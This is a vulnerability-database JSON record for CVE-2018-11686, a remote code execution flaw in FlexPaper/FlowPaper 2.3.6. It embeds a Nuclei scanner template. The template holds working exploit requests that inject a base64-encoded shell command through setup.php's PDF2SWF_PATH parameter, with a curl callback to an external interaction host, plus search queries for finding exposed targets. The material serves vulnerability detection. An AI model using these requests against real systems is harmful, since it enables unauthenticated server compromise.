{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-11686/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-11686/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-11686/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-11686/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-11686/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-11686"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-11686"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2018/CVE-2018-11686.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2018-11686\n\ninfo:\n  name: FlexPaper/FlowPaper 2.3.6 - Remote Code Execution\n  author: iamnoooob,pdresearch,pszyszkowski\n  severity: critical\n  description: |\n    The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code on the server through the Publish Service, leading to complete server compromise and access to all hosted documents.\n  remediation: |\n    Upgrade to FlowPaper version 2.3.7 or later, or remove the vulnerable Publish Service.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-11686\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-11686\n    cwe-id: CWE-20\n    epss-score: 0.52542\n    epss-percentile: 0.98915\n    cpe: cpe:2.3:a:flowpaper:flowpaper:2.3.6:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: flowpaper\n    product: flowpaper\n    shodan-query: title:\"FlexPaper\"\n    fofa-query: title=\"FlexPaper\"\n  tags: cve,cve2018,flexpaper,flowpaper,rce,vkev,vuln\n\nvariables:\n  cmd: \"curl oast.pro\"\n  cmd_b: \"{{base64(cmd)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /php/change_config.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        SAVE_CONFIG=1&SWF_Directory=config/\n\n      - |\n        POST /php/change_config.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        SAVE_CONFIG=1&SWF_Directory=config/\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(header, \"index.php?msg=Configuration%20saved!\")'\n          - 'status_code == 302 || status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /php/setup.php?step=4&PDF2SWF_PATH=echo+{{cmd_b}}+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        GET /php/config/output.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body_2, \"Interactsh Server\")'\n          - 'contains(content_type_2, \"text/plain\")'\n          - 'contains(location_1, \"index.php\")'\n        condition: and\n# digest: 4b0a00483046022100f125afbef98a9f3c6daa9e384a2211219ad74bd6f9fb6ab49777b9ad093e18320221008edc2cb541032bda6f9c197df4e1435b7c19e54e2a4e4709738762b2f43f8ffa:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2018-11686"
}